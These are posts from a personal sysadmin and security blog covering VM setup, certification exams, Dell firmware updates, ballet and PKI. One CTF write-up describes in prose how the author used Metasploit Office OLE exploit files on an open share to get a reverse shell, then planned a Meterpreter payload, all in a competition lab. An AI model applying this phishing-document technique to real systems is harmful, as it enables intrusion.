The up-command actually starts the build of the VM, after which it is booted. The first installation will take a few minutes, after that you can just manage the VM using the VirtualBox user interface. 

The Kali Linux Vagrant build includes the full graphical user interface! But you can also ssh -p 2222 vagrant@localhost to log in to the VM. Be sure to create your own account and to change all passwords!

 

GCrypt fix

Your Linux distribution may have problems performing SHA2 calculations correctly. According to this source, it’s “Because apt use sha256 method from libgcrypto20, but optimized too much. We can deny this opt. using configuration file /etc/gcrypt/hwf.deny.” 

        $ sudo bash
        # mkdir /etc/gcrypt
        # echo all >> /etc/gcrypt/hwf.deny
 

In addition, we learned that in our nested situation (VirtualBox on top of Hyper-V) it may be a good idea to change your VM's "paravirtualization interface" from "Normal" to "Minimal". #TIL that this is not about how VBox provides better performance, but about what paravirtualization information is passed to the guest OS. In my case this change did fix hashing problems. This change can be made manually by editing the VM settings in VirtualBox (VM → Settings → System → Acceleration → Paravirtualization interface), or in the Vagrant file:

        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]

 

Example Vagrantfile with two VMs 

Vagrant.configure("2") do |config|

  config.vm.define "kali" do |kali|
    kali.vm.box = "kalilinux/rolling"
  kali.vm.hostname = "haxor"
    kali.vm.network "forwarded_port", guest: 22, host: 2222, host_ip: "127.0.0.1"
    kali.vm.network "forwarded_port", guest: 3389, host: 2389, host_ip: "127.0.0.1"

    kali.vm.provider "virtualbox" do |vb|
        vb.gui = true
        vb.memory = "6144"
        vb.cpus = 3
        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
    end

    kali.vm.synced_folder '.', '/vagrant', disabled: true
 
    kali.vm.provision "shell", inline: <<-SHELL
        echo "Here we would install..."
        [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
        [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
SHELL

  end


  config.vm.define "centos8" do |centos8|
    centos8.vm.box = "centos/8"
    centos8.vm.hostname = "centos8"
    centos8.vm.box_check_update = true

    centos8.vm.network "forwarded_port", guest: 22, host: 2200, host_ip: "127.0.0.1"

    centos8.vm.provider "virtualbox" do |vb|
        vb.gui = false
        vb.memory = "1024"
       vb.cpus = 1
        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
   end

  centos8.vm.provision "shell", inline: <<-SHELL
        echo "Here we would install..."
        [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
        [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
    SHELL

    centos8.vm.synced_folder '.', '/vagrant', disabled: true

  end

end

kilala.nl tags: , ,

View or add comments (curr. 0)

Finally! Red Hat offers at-home exams

2020-09-06 21:18:00

It's been a while in coming and I'm very happy they finally made it! Red Hat have joined the large number of companies who now offer at-home test taking for their professional certifications

I quite enjoyed the way CompTIA handled their at-home examinations, but it looks like Red Hat have taken a very different approach. I still need to take the EX407 exam, so I'd better take a quick look!

Back in 2013 I was one of the first hundred people to use the Red Hat Kiosk exams, still have the souvenir key chain on my laptop bag. Let's see if their at-home tests work better than the Kiosk ones. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Taking the 2020 CompTIA Cloud+ beta

2020-08-13 11:35:00

It's become a bit of a hobby of mine, to take part in CompTIA's "beta" exams: upcoming versions of their certification tests, which are given a trial-run in a limited setting. I've gone through PenTest+, Linux+ and CySA+ so far :)

After failing to get through the payment process at PearsonVue, a friendly acquaintance at CompTIA helped me get access to the Cloud+ beta (whose new version will go live sometime early next year).

I sat the beta test this morning, using the new online, at-home testing provided by PearsonVue. Generally speaking, my experience matched what's outlined in the big Reddit thread.

Most importantly, on MacOS the drag-n-drop on PBQs is really slow. You have to click and hold for three seconds before dragging something. Aside from that the experience was pleasurable and it all worked well enough.

I'm not as enthused about the Cloud+ beta as I was about Linux+ and PenTest+ at the time. The questions seemed very repetitive, sometimes very predictable (if "containers" was an option, two out of three times it'd be the correct answer) and some just unimaginative (just throw four abbreviations or acronyms at the test-taker, two or three of which are clearly unrelated). Knowing CompTIA I assume there will be plenty of fine-tuning happening in the next few months.

I'm pretty sure I didn't pass this one, but I'm happy to have had the chance to take a look :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for PearsonVue at home, online testing

2020-08-12 15:35:00

This Reddit thread offers a plethora of information on the at-home, online test taking offered by PearsonVue.

Big lesson I learned as a MacOS user: disable Little Snitch and other filtering / security software while you're taking the test. It feels dirty, but to ensure the software does not encounter any hiccups (which may result in you botching the test) you're going to have to. Better yet, don't just disable the software but quit it entirely, because any popups on your screen will also alert the proctor.

Just to be safe, I made a dummy user account on my Macbook, so I can remove all trace of the software afterwards. Luckily it runs from your downloads folder and doesn't need any admin-level access.


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching helps you break habits

2020-08-09 19:39:00

It's hilarious how stuck in one's ways one can get. I mean, I've always typed:

netstat -a | grep LISTEN | grep ^tcp

While prepping slides for my students, imagine my mirth when I learned "there's a flag for that". Man, it pays to read man-pages. 

netstat -l4
ss -l4

#EternalNewbie 💖


kilala.nl tags: , ,

View or add comments (curr. 0)

Expanding my homelab: more 11th gen Dell

2020-08-01 20:21:00

R410 and R710

The Dell R410 in my homelab has served me very well so far! With a little upgrade of its memory it's run 20 VMs without any hassle. Finding this particular configuration when I did (at a refurbishing company) was a lucky strike: a decent price for a good pair of Xeons and two large disks. 

I've been wanting to expand my homelab, to mess around with vMotion, Veeam and other cool stuff. Add in the fact that I'd love to offer "my" students a chance to work with "real" virtualization (using my smaller R410) and you've got me scouring various sources for a somewhat bigger piece of kit. After trying a Troostwijk auction and poking multiple refurbishers I struck gold on the Tweakers.net classified ads! 

Pictured above is my new Dell R710, the slightly beefier sister of the R410. It has space for more RAM and more disk drives, and most importantly (for my own sanity): it's a 2U box with larger fans, which produces a lot less noise than the R410. The seller even included the original X5550 CPUs separately.

So! From the get-go I decided to Frankenstein the two boxes, so I could actually put the R410 to use for my students while keeping a bit more performance in my homelab. 

Moving that RAID1 set from the R410 to the R710 was an exciting exercise!

I really did not want to lose all of my VMs and homelab; I've put a year into the environment so far! Officially and ideally, I would set up VMware ESXi on the R710 and then migrate the VMs to the new host. There are many methods:

Couldn't I do it even faster? Well sure, but you can't simply move RAID sets between servers! Most importantly: you'll need the same or similar RAID controllers. In a very lucky break, both the R410 and the R710 have the Dell/LSI Perc 6i. So, on a wish and a prayer, I plugged in the RAID set and told the receiving Perc 6i to import the foreign configuration. And it worked! 

After booting ESXi from the SD card, it did not show any of the actual data which was a not-so-fun surprise. Turns out that one manual re-mount of the VMFS file system did the trick! All 24 VMs would boot!
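
For anyone in the same boat: re-mounting such a volume from the ESXi shell goes roughly like this (a sketch based on the documentation, not necessarily the literal commands I typed back then):

esxcli storage filesystem list                  # is the datastore visible but unmounted?
esxcli storage filesystem mount -l <datastore label>
# if ESXi instead flagged the volume as a snapshot copy, esxcfg-volume -l / -M is the tool to look at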

So far she's a beaut! Now, onwards, to prep the R410 for my students.


kilala.nl tags: , ,

View or add comments (curr. 0)

CTT+ certification achieved!

2020-07-10 13:45:00

It's official! After passing the theoretical exam in June and completing the practical, virtual classroom assessment this week, I'm now officially CTT+ certified: CompTIA CTT+ Virtual Classroom Trainer Certification.

Many thanks to the people who supported me; you know who you are! 💝


kilala.nl tags: ,

View or add comments (curr. 0)

Dell 11G (11th generation) server firmware updates in 2020

2020-06-13 22:20:00

Update:

One Reddit user suggests that, while my suggested way of working is easier than others, it may also lead to "bricking" of servers: literally rendering them unusable, by applying firmware updates out of order. 

Their suggestion is to instead use the SUU (Server Update Utility) ISO image for the server in question, which may be run either from a booted Windows OS, or through the LCM (Life Cycle Manager). 

More information about the SUU can be found here at Dell.

Also, if you take a look at Dell's instruction video about using the SUU ISO from the LCM, I think we can all agree that this is in fact the easiest method bar none. 

EDIT: That is, if it weren't for the fact that the old LCM firmware on the R410 cannot read the SUU files. So you will have to run the SUU from Windows or CentOS instead.

 

TLDR:

If you want to skip all the blah-blah:

 

Introduction

Early in 2019 I purchased a Dell R410, part of Dell's eleventh generation (11G) server line-up from 2010/2011. Since then I've had a lot of fun growing and maintaining my homelab, learning things like Ansible and staying in touch with Linux and Windows administration. 

One task system administrators commonly perform, is the upgrading of firmware: the software that's built into hardware to make it work. If you check out the list of available firmware options for the R410, you'll see that quite a lot of that stuff goes into one simple server. Imagine what it's like to maintain all of that stuff for a whole rack, let alone a data center full of those things!

In the case of the R410, support options from Dell are slipping. While many homelabs (and some enterprises) still rock these now-aging servers, the vendor is slowly decreasing their active support.

In my homelab I have tackled only a small number of firmware updates and I'll quickly discuss the best/easiest way to tackle each. In some cases it took me days of trying to figure them out!

 

A note about Dell's Life Cycle Manager (LCM)

Dell's 11G systems (and later) include the Life Cycle Manager (LCM), which makes firmware updates a lot easier. You reboot your server into the USC (Unified System Configurator), launch the updater and pick the desired firmware updates.

Here's a demo on YouTube.

Unfortunately, somewhere in 2018 Dell dropped the 11G updates from their "catalogs". You can still use the following steps to make your 11G system check for updates, but it won't find any. You can check the catalogs yourself at https://ftp.dell.com/catalog/. Mind you, based on this forum thread, the Dell ftp/downloads site hasn't been without issues over the years.

  1. Boot your server and press F10 to launch System Services.
  2. In the menu, choose USC Settings (or whichever option lets you configure networking). By default USC will not retain its network configuration, or properly start the NIC, so you have to run this configuration each time.
  3. After configuring the network access, go back to the USC menu and choose to Launch the updater
  4. Apply the following settings:
    Server = ftp.dell.com
    Username =
    Password =
    Catalog path = /catalog/
    Proxy =
  5. If you now start the update process, the system will fetch and verify the catalog after which it will throw the following error.
"No update is available. Make sure that the Windows(R) catalog and Dell(TM) Update Packages for Windows(R) are used."

There are no more updates for 11G systems available for LCM.

 

A note about Dell Repository Manager

Technically it's possible to make your own internal clone of Dell's software update site. For a large enterprise, that's a great idea actually! Dell's recommended way of setting up a mirror to host updates for your specific systems, is to use the Repository Manager (DRM).

You could also use DRM to create a bootable USB stick that contains the updates you want, so the system can go and update itself, using LCM. Great stuff!

But you're still going to run into the same issue we discussed in the previous paragraph: 11G updates are no longer available through the catalogued repository. You can only get them from the Dell support site, as per below.

So for 11G, forget about DRM. For anything besides the iDRAC, you will need to boot an OS to update your firmware.

 

iDRAC6 update

Updating the iDRAC integrated management system (if you have it) is the easiest task, assuming that you have the full Enterprise kit with the web GUI. 

  1. Visit Dell's support site for your hardware, like here for the R410
  2. Download what is labeled as the latest "Dell iDRAC monolithic release".
  3. The downloaded file is a .exe self-extracting ZIP file. If you open this ZIP file, you will find a file with extension .d6 in there. 
  4. Visit your iDRAC6 web GUI and choose Update Firmware from the Quick Launch Tasks list. 
  5. Upload the .d6 file we extracted and let the iDRAC do its magic. 

 

Booting an OS to perform updates: BIOS and LCM

My R410 runs VMware ESXi which, while it's a Unix, is not supported to run Dell's firmware updates from. Dell support a plethora of Windows versions, a few other OSes and (for the 11G systems) RHEL 5 or 6 (Red Hat Enterprise Linux). 

I first wanted to try CentOS 6 (a RHEL 6 derivative), because that's an OS I'm quite comfortable with. I grabbed an ISO for CentOS 6 Live, used dd to chuck it onto a USB stick and booted the OS. Running the BIOS and LCM updates worked fine.

  1. On the Dell support site for R410, make sure to choose "Red Hat Enterprise Linux 6" as the target OS.
  2. Then grab the "Dell Server BIOS PowerEdge R410 Version 1.14.0" and "Dell Lifecycle Controller v1.7.5" downloads.
  3. You'll get a .BIN file, which is a shell script including binary content. Basically the Linux equivalent of a self-extracting ZIP. 
  4. Put these .BIN files on another USB stick, or download them using the browser on the CentOS live OS. 
  5. From a terminal, literally run the .BIN file as you would a shell script. It'll do what you need, or maybe throw an error or two that should be easily solved.
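In practice that last step boils down to something like the following, run from the live environment. The filenames here are hypothetical; use whichever BIOS and Lifecycle Controller packages you actually downloaded:

  # make the Dell Update Package executable, then run it as root
  chmod +x ./R410_BIOS_1.14.0.BIN
  sudo ./R410_BIOS_1.14.0.BIN

  # same routine for the Lifecycle Controller package
  chmod +x ./R410_LCM_1.7.5.BIN
  sudo ./R410_LCM_1.7.5.BIN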

However, the BMC update proved to be quite a mess! In the .BIN package you'll find a rat's nest of shell scripts and binaries which have dependencies not available by default on the CentOS 6 live DVD (like procmail and a bunch of older C libraries). I tried fighting my way through all the errors, manually tweaking the code, but finally decided against it. There has to be an easier way!

 

Booting an OS to perform updates: BMC

Thanks to a forum thread at Dell, I learned that there is in fact an easier way. Instead of fighting with these odd Linux packages, let's go back to good ol' trusted DOS! 

FreeDOS that is!

I learned that booting FreeDOS from a USB stick on the R410 is problematic. In my case: it's a no-go. So I took FreeDOS 1.3 and burned their Live CD to a literal CD-ROM. Stuck that in the R410's DVD drive and it boots like a charm!

While FreeDOS does not have USB drivers, there is some magic in the underlying boot loaders that will mount any USB drives attached to the system during boot-time. The USB stick I put in the back USB port was made available to me as C:, while the booted CD-ROM was R:.

What do you put on that USB stick? The contents of the PER410*.exe files available from Dell's support site. Each of these is yet another self-extracting ZIP file, containing all the needed tools for the update. 

After removing the two iDRAC modules and getting the correct update (more on both below), I followed the instructions from Dell's support team in that forum thread: extracted the ZIP file onto the USB stick, booted FreeDOS and ran "bmcfwud". The system needed a reboot and a second run of bmcfwud. And presto! My BMC was updated!

 

A note about BMC and iDRAC

BMC stands for Baseboard Management Controller. It's Dell's IPMI-based management system, integrated right into the motherboard of the 11G systems. It'll let you do some basic remote management. The most important reason for homelab admins to consider updating the BMC is to get version >=1.33, which greatly decreases fan noise.

BMC was superseded by iDRAC (integrated Dell Remote Access Controller), which offers cool features like SSH access, a web GUI and much, much more! Here's a short discussion about it.

For all intents and purposes iDRAC replaces BMC. If you have an iDRAC installed, the BMC will not be active on your 11G system. The fan noise issues on the R410 should be fixed with any recent version of the iDRAC firmware.

So why did I want to update the BMC firmware? 

Because I'm stubborn. =)

Initially, running the updater failed because it said my BMC was at version 2.92. Well, that's impossible!

Turns out, that's because I still had the iDRAC in there! :D I removed both iDRAC daughter cards and tried again. 

A downgrade? While I grabbed the most recent BMC update from Dell's site?! No thank you!

So, funny story: Dell's support site for the R410 states that the most recent available version for BMC's firmware is 1.15. The poweredgec.com site for 11G also confirms this. But if you manually search for them, you'll find newer versions.

Apparently my BMC already had 1.54, so it already had the fan updates from 1.33. Guess all the noise that thing was making was "normal". Anyway, grabbing the 1.70 update and running bmcfwud finally had the desired end result. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Ballet at La Bayadère in Almere

2020-01-09 20:42:00

I am very grateful towards my classmates and our teacher Lyda de Groodt, at ballet school La Bayadère in Almere (Facebook). They've always been awesome to our daughter, to my wife (when she still trained there) and now to me. 

As they say: "Don't judge a book by its cover". Sure, La Bayadère isn't a big brand-name corporation and no, they don't have some fancy modern studio. But they provide quality: personal guidance, a keen eye, discipline and of course a bit of fun! The students with whom I've trained want to learn proper ballet, but it's clear that we also do it for our own enjoyment. Today, I remarked to S. that "what I really love about this group, are all the smiles and laughs". Our group isn't just focused on rigorous dance, we also connect a bit on a personal level. 

I'm really happy to be training with people like T., Q., A. and I.: they never fail to make me feel like I'm twenty years younger again! ^_^

Ballet certainly is different from what you're used to seeing from me, after a sports hiatus of three years and four years of hard-hitting kendo. But I really, really enjoy it. Now that I think of it, it's funny that I haven't started writing about it earlier, seeing how voracious I was about kendo-blogging.


kilala.nl tags: , ,

View or add comments (curr. 0)

Finding study goals

2019-12-27 13:52:00

2020's right around the corner and I've been poking colleagues, urging them to set study-goals for the upcoming year. In Dutch, we have a saying equating a lack of progress to deterioration: "Stilstand is de dood" ("Stagnation is death"). I believe that this proverb applies very heavily to work in IT: if you're not keeping up with the times, you're going to get outdated real quickly. 

A colleague asked for suggestions on how to set goals for yourself, to which I replied:

I'd suggest taking into account things like A) where do you want to be in 2-3 years? B) is your team or company lacking particular knowledge or experience? C) do you, or your team, have requirements that you need to fulfill through training? D) do you see any chances that will allow you to quickly up your perceived value?

Basically: train for the job you want, fill any gaps that your team has and make sure you're not dropping any balls.

For me, EX407 fills categories B and C (my current team has little Ansible experience and it will renew my RHCE, which will lapse in 1.5 years). The Python for pen-testing course will help me with A (I want to move towards red-teaming and my current coding skills are almost nil).

This year's CySA+ was for category D (it was heavily discounted and I'm pretty sure I could pass it, thus adding a well-regarded cert to my name). Ditto for trying the SANS Work/Study programme, which gets me a heavy discount on a very big-name training and cert.

Finally: just keep a list of things that you want to investigate or work on. Maintain it throughout the year, add new things, remove unwanted things, change priorities. That way you're always set for A) next year's study plans and B) that all-time favorite interview question "Where do you see yourself in two years? What are your short-term development plans?"


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA CySA+ beta experience (CS1-002)

2019-12-09 12:53:00

Another day taken off from work for fun stuff! This time around I went in for yet another CompTIA beta exam, the new CS1-002 CySA+. Like before I sat the exam at my favorite testing center: IT Vitae in Amersfoort. The old Onze Lieve Vrouwe monastery and green surroundings make for a relaxing atmosphere! What was new this time, is that I sat the exam in tandem with my colleague D. She's great company, darn clever and she was looking to get back into the certification-game.

First up, let me point you at a great review of the CS1-002 beta exam, by u/blackvapt on Reddit. And here's the official thread on Reddit, inviting people to take part in the beta.

I will echo everything /u/blackvapt said. The new CySA+ exam is in fact good! The questions are in-depth and technical, without overly focusing on commandline options and flags. In that regard it matches my experience with the PenTest+ exam in 2018: the exam tests for insight and experience in the field of incident response. It's not something you can simply cram books for, you'll need to have experienced many of the situations discussed on the test. The thing is: it's nigh impossible to learn every log format and every OS out there, but if you can intuit the meaning of logs and commands based on your experience, you'll go a long way!

The PBQs (performance based questions) were great! I enjoyed most of them and thought them to be actually fun and a nice multi-layered puzzle. So much better than my experience with the Linux+ exam which only managed to frustrate me with its strict and limited PBQs. 

Preparation-wise I'll admit that I took it easy. I was relying mostly on A) my experience from the past 5-10 years, B) the Jason Dion practice exams for CS1-001 on Udemy and C) the Chapple & Seidl book from Sybex. I spent about twenty hours reviewing and researching, over a month's time.

I didn't spend more than $25 on the preparations, as the practice exams were on discount down to $10 and I got the C&S book through Humble Bundle in a large stack of awesome Sybex books. One note about Humble Bundle: I cannot recommend the Packt books or bundles! Skip those. But snag anything you can get from Sybex, NoStarch or O'Reilly!

Regarding the Dion practice tests: I was not passing any of these while preparing as I mentioned earlier this week. It was odd because I felt good on most of the answers I gave to Jason's questions, but I kept missing the passing grade by a fair margin. During the beta exam I felt great about ~85% of the questions, so it's really a crap-shoot on whether I passed the beta or not. :)

If I didn't pass, I wouldn't mind at all! This was a great exam, with solid challenging questions. If I don't make it, I will definitely take the exam again (at full price), now knowing what to expect.


kilala.nl tags: , ,

View or add comments (curr. 0)

Almost time for another Beta exam: CompTIA CySA+

2019-12-05 09:31:00

I've got my exam planned for Monday and I'm looking forward to it. I'll mostly treat it as a recon mission, doing it part for fun and part to see if I'd like to take the exam "for real" should I not pass.

I've got a sneaking suspicion I won't pass this time around though (unlike the Linux+, Pentest+ and CFR-310 betas) because my experience keeps tripping me up. Sounds like a #HumbleBrag, I know, sorry :D What I mean is that CompTIA mostly seems targeted at US-based SMB, while my experience comes from EU-based international enterprises. I've been doing a few of Jason Dion's test-exams for the previous version, to get into the right mindset, but I fail a lot of questions because of the aforementioned factors.

Well, let's see how it turns out. For now, I'll just go and have fun with it :)


kilala.nl tags: , ,

View or add comments (curr. 0)

"If it were easy, I wouldn't be doing this"

2019-11-18 20:59:00

bob ross

... That's what I told my classmate B. (their ballet blog is here) tonight: "if it were easy, I wouldn't be doing this." That's what I honestly believe: I often do things because they're a challenge. Hence why I kind of live by Bob Ross' quote shown to the left.

Or as Nobel laureate Craig Mello put it: "Ask yourself: “are you having fun?”. And sometimes it’s not fun, but there’s something at the back of your mind maybe saying: “if I can just figure this out”, you know? And when you do, finally do make sense of that thing, man! It’s so much better because it was hard!"

So, what are B., our classmates and myself learning?

Ballet.

I am learning ballet and have been for a few months now. I'm an uncoordinated ditz, struggling with basics, but I'm loving it even when I'm hating it. The hating is short and momentary, the loving is something that sticks. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

In many cases, just cramming for an exam won't work

2019-11-18 20:44:00

Today, someone on Reddit posted the following question:

"I have the [...] practice exams, I typed the entire [...] video course from YouTube and I just brought the exam cram book but no matter how much I study I don’t retain anything. Do you guys have tips?"

OP ran into the wall that is learning styles: cramming simply doesn't work for everybody! I'm no expert by any means, but I did explain the following:

It is entirely possible that your current method simply does not suit your personal learning style! If you start poking around the web a little bit, researching learning styles, you will find very quickly that there are many different methods!

You can try and keep brute-forcing your learning the way you have right now, but maybe that will simply not get the results you want. Why not have a think about your days in primary, middle and high school? What did the classes you did best in have in common?

Perhaps you're someone who simply needs something else than quiet self-study, taking notes while listening to a teacher.

Personally I have found that I put great importance on putting new information into context. I don't want to learn floating, individual topics, I want to put them into a context that I'm already familiar with, or build a context around them. This helps me better understand the new material's place. One thing that could help you with this is making mind maps.

Or perhaps you're someone who learns better by doing than by hearing. I understand that playing around with new tools and concepts in a lab can take a lot of time, but there's a reason why many books include lab exercises for the reader. It is often said that people learn <20% by hearing and >50% by doing.

Finally, it is also often said that one way to solidify and test your understanding of a subject, is to explain the topic to somebody else. If you can explain X or Y to a friend, your partner or a rubber ducky, then you can be sure that you've come to a proper understanding. Or perhaps you will find a few gaps in your knowledge that you need to fill out. Either way, it's a win-win.

 


kilala.nl tags: ,

View or add comments (curr. 0)

Zine: "The tale of the Dubious Crypto", a pentesting adventure

2019-11-08 16:15:00

A broken padlock

If you've met me IRL, you will most likely have seen me doodling or drawing. It's an almost compulsory thing for me! I've often said that drawing is like my brain's "Idle Process", running in the background making sure I pay attention to things around me, like meetings or phone calls.

Over the past 30+ years I've mostly drawn for my own enjoyment, though I've also published yonkoma comics about my daily life and even tried my hand at a short story or two. In 2019 things took a new turn after b0rk (Julia) and SailorHG (Amy) inspired me to make a "zine".

To sum it up, a "zine" (short for magazine) is a self-published booklet about subject matter that's dear to the author's heart. The Public have made a wonderful zine explaining zines (how meta!), which is available here: An Introduction To Zines.

For starters, I'll write about things I've learned during my work and studies which I feel are well-worth sharing with others. The first issue, "The tale of the Dubious Crypto" covers Windows security practices and bad cryptography implementations in a piece of software I pen-tested.

You can find all upcoming releases, including printing instructions and license information, over here -> https://github.com/tsluyter/Zines


kilala.nl tags: , ,

View or add comments (curr. 0)

PenTester Academy CRTP exam

2019-10-22 14:24:00

Ooooffff... What a night. What a day. I'm beat :)

It's hard to believe that my OSCP examination took place 2.5 years ago. It feels much more recent! Or maybe that's wishful thinking...

Anywho, over the past twenty-four hours I repeated the experience by taking part in PenTester Academy's CRTP exam: Certified Red Team Professional. It's the closing piece to their "Attacking & Defending AD" online training.

I'm gonna say that this exam is absolutely not a red-teaming exercise (per Deviant Ollam). RT would include attacks on the physical space, on human employees and on IT resources. And this exam squarely focuses on IT only. So the "RT" in "CRTP" is badly chosen, but alright. Let's put it down as marketing.

So! There are a few reviews out there about the CRTP (like Truneski's, or this thread on TechExams, and Spentera's), but as always I'm going to quickly recap my own experiences.

To get the obvious question out of the way: was it worth it? I got in at the introductory price of $550 for 90 days (normally $600) and either way I'd say "Heck yes!". Fourteen hours of video material and a well-built lab environment to hack Active Directory made it well worth it! 

Nikhil's videos are well-made and are perfect for playing at 1.3x or 1.5x speed.  The slide deck and lab guides are certainly good enough as well. 

It's great how the training explains multiple ways to achieve the same goal, though at times it became hard to tell them apart :D That's mostly a failing of my own though. It has become very much apparent that I need to go back and review these materials a few times before fully grasping these AD attacks. Luckily there are many great resources, like the harmj0y, adsecurity and Specter Ops blogs.

Excluding the exam, I spent roughly sixty (60) hours on the videos, labs and research. That's a lot of CPE for my CISSP, CEH and CompTIA certs!

The exam! Ooohhh, I loved it! It's like OSCP, where you're given a twenty-four-hour window to attack and pwn a number of target systems. But where OSCP offers a handful of disparate hosts, CRTP has them tied together in an Active Directory environment. You're not attacking software on its vulnerabilities, no, you're attacking an environment based on misconfigurations in AD or Windows!

Like ChrisOne in the TechExams thread I ran into a wall which would last me well over six hours. Here's a rough timeline (it's no secret that there are five target hosts, so I feel it's safe to describe the timeline):

You will notice that things moved really fast once I got onto the second target host. That's because my enumeration of the domain objects had provided me with a clear path of attack to move from the second through to the fourth one. The fifth one was pretty cut and dry from there on out, but it required more manual labour. 

Getting privesc on my workstation only took so long because I didn't want to outright get started with that. :) I first wanted to put as much time as possible into properly enumerating the domain.

By 2230, exactly twelve hours after the start of my exam, I was done with the attacks. I'd gathered notes and lots of evidence while attacking, so all that remained was writing the report. That's where things took a turn for the nostalgic: it played out like my OSCP exam! I wanted to take a nap before writing the report, but really could not get to sleep. So by 0030 I was up and writing again! And finally, five hours later at 0530, I submitted roughly 36 pages of report to PTA.

Fingers crossed! I'm hoping for good news!


kilala.nl tags: , ,

View or add comments (curr. 3)

Ooofff, what a week (yes, still alive)

2019-10-04 20:01:00

And to think that I used to be such a diligent blogger! Weekly, or even daily updates! And now I've been quiet for almost three months?! Either I've got nothing going on in my life, or way too much! :p Hint: it's the latter.

This week has been awesome!

I snagged my first official CVE, an XSS in Micro Focus Enterprise Server. I'd been sitting on that one for a few months now, so I can finally gloat a little bit :)

===

Last night was PvIB's annual CTF. Lemme tell you, it was a lot harder than in the previous years! I only managed to grab one of the "easy" flags. I learned a few cool new things though that I hadn't done before.

Most importantly: using Wireshark to decrypt TLS traffic in a PCAP. I had assumed that you would need the server's private key to do so, which turned out to be correct :) In this case the traffic had been encrypted with a private key which a malware creator had accidentally leaked. Had I Googled the subject's name on the certificate earlier, then I'd have found the private key much sooner as well ;)

===

Speaking of challenges: I took ${CLIENT}'s internal secure programming training for DevOps engineers this week. The training's a bit rough around the edges, but it covers a lot of important stuff for folks building web apps. I'm pretty impressed and also a bit daunted about teaching it in a few weeks. 

I'm now horribly aware that my webdev experience is 15 years old and antiquated. I've never even done much Javascript, let alone Flask, Angular, Jinja, and so on. So that's a challenge.

I took the exam for the course today: it was great! Like a mini OSCP where you're given a webapp with 15+ known vulnerabilities (ranging from CSRF and XXE, through SSTI, to broken deserialization and JWT tokens). Lots of those things I'd not heard of yet! 

Anyway: you have nine hours! Find all the vulns, exploit them, suggest fixes and remedies and then report it all correctly. Nine hours?! That was a slog, even having full white-box access to the Docker container and all the sources.


kilala.nl tags: ,

View or add comments (curr. 0)

Yes, I'm still here! Just very busy

2019-07-31 21:48:00

It's been three months since I last posted publicly. Don't worry, I'm still here :) I just have a lot of things going on.

In our private life lots of things are also going on, but I'll leave those for another time and place.


kilala.nl tags: ,

View or add comments (curr. 1)

CTF036 2019, the Secured By Design CTF

2019-04-05 09:10:00

Me, on stage

The photograph on the left was provided by Secured By Design.

I love CTFs and though I can't take part in a lot of them, I make it a point to always play in Secured By Design's CTF036. Four years in a row now and the events just keep getting better! 

I was invited to give a small talk again, this time covering the basics of PKI: public key infrastructure. In short, PKI is one of the ways to solve the challenge of "trust" in an environment: how can you trust that someone or something really is whom they claim to be? We were very much cramped for time, so I had to try and smush everything into half an hour! While the talk went smoothly, I'm not entirely happy: there was just too much info in too little time. And I didn't even cover it all! 

My slide deck for "When Alice met Bob..." is over here. 

The CTF itself was, as always, a blast! Roughly a hundred participants, attacking six copies of the same target environment: three servers and two desktop systems, part of a fake school's infrastructure. Our goal was to grab as many student IDs as possible. 

The usual suspects were there yet again: weak passwords on mailboxes, SMB shares without proper ACLs, simulated end-users and a rudimentary daemon which you could try a buffer overflow on.

I spent most of my time on attacking one of the end users: a professor. The school's website featured an open forum, with sections dedicated to each of the classes taught. One professor warned his students that their final presentations were due any day now and that they should be submitted "through the usual share". This refers to the aforementioned, open SMB share which had a subfolder "Presentations". 

I recalled that SEToolkit and Metasploit offered options to create Word/Powerpoint/Office payloads, but had forgotten how. I'm rusty, it's been a while since I've done this :) After a bit of research, I turned to exploit/windows/fileformat/office_OLE*. When configuring the exploit I simply chose to target all possible options, which generated roughly twenty files with shellcode. In real life this would obviously not work, because who would fall for that?! Twenty files without content, clicking through all of them? Nope :) But in this case the script set up on the workstation (to simulate the professor) was greedy and simply went through all of them. 

Using this method I got a nice shell_reverse_tcp to my port 443. Looking to escalate my privileges on the workstation I tried to get a Meterpreter payload to run in the same way, but failed. I guess the payload was too tricky for the target. 

I explained this particular attack vector to two teams (ex-colleagues to my right, the team in #1 slot to my left), which was a fun exercise. I love explaining stuff like this to people who're just getting their feet wet (my ex-colleagues). The #1 team quickly latched onto the idea and offered an improvement to the attack: use the reverse shell to download a Meterpreter payload .EXE file. Duh! I should've thought of that! 

Anyway: a wonderful day with fun hacking and meeting cool people! Heartily recommended :)


kilala.nl tags: , ,

View or add comments (curr. 1)

PKI: using a private versus a public ca

2019-04-05 06:17:00

This morning an interesting question passed through the SANS Advisory Board mailing list:

"Looking for anyone that has done a cost benefit analysis, or just general consideration, of using a Public CA vs. a Private CA for a PKI deployment. Some vendors are becoming very competitive in this space and the arguments are all one-sided. So aside from cost, I’m looking for potential pitfalls using a public CA might create down the road."

My reply:

My previous assignment started out with building a PKI from scratch. I’d never done this before, so the customer took a gamble on me. I’m very grateful that they did, I learned a huge amount of cool stuff and the final setup turned out pretty nicely! I’ll try and tackle this in four categories.

UPSIDES OF PRIVATE PKI

 

UPSIDES OF PUBLIC PKI

 

DOWNSIDES OF PRIVATE PKI

 

DOWNSIDES OF PUBLIC PKI

If your infrastructure needs to be cut off from the outside world, you will HAVE to run your own, private PKI. 

I’ve recently presented on the basics of PKI and on building your own PKI, be it for fun, for testing or production use. The most important take-away was: “If you’re going to do it, do it right!”. You do NOT simply fire up a Linux box with OpenSSL, or a single instance Windows Server box with ADCS and that’s that. If you’re going to do it right, you will define policy documents, processes and work instructions that are to be strictly followed, you’ll consider HA and DR and you’ll include HSMs (Hardware Security Modules). The latter are awesomely cool tech to work with, but they can get pricy depending on your wants and needs. 

Remember: PKI might be cool tech, but the point of it all is TRUST. And if trust is damaged, your whole infrastructure can go tits-up. 


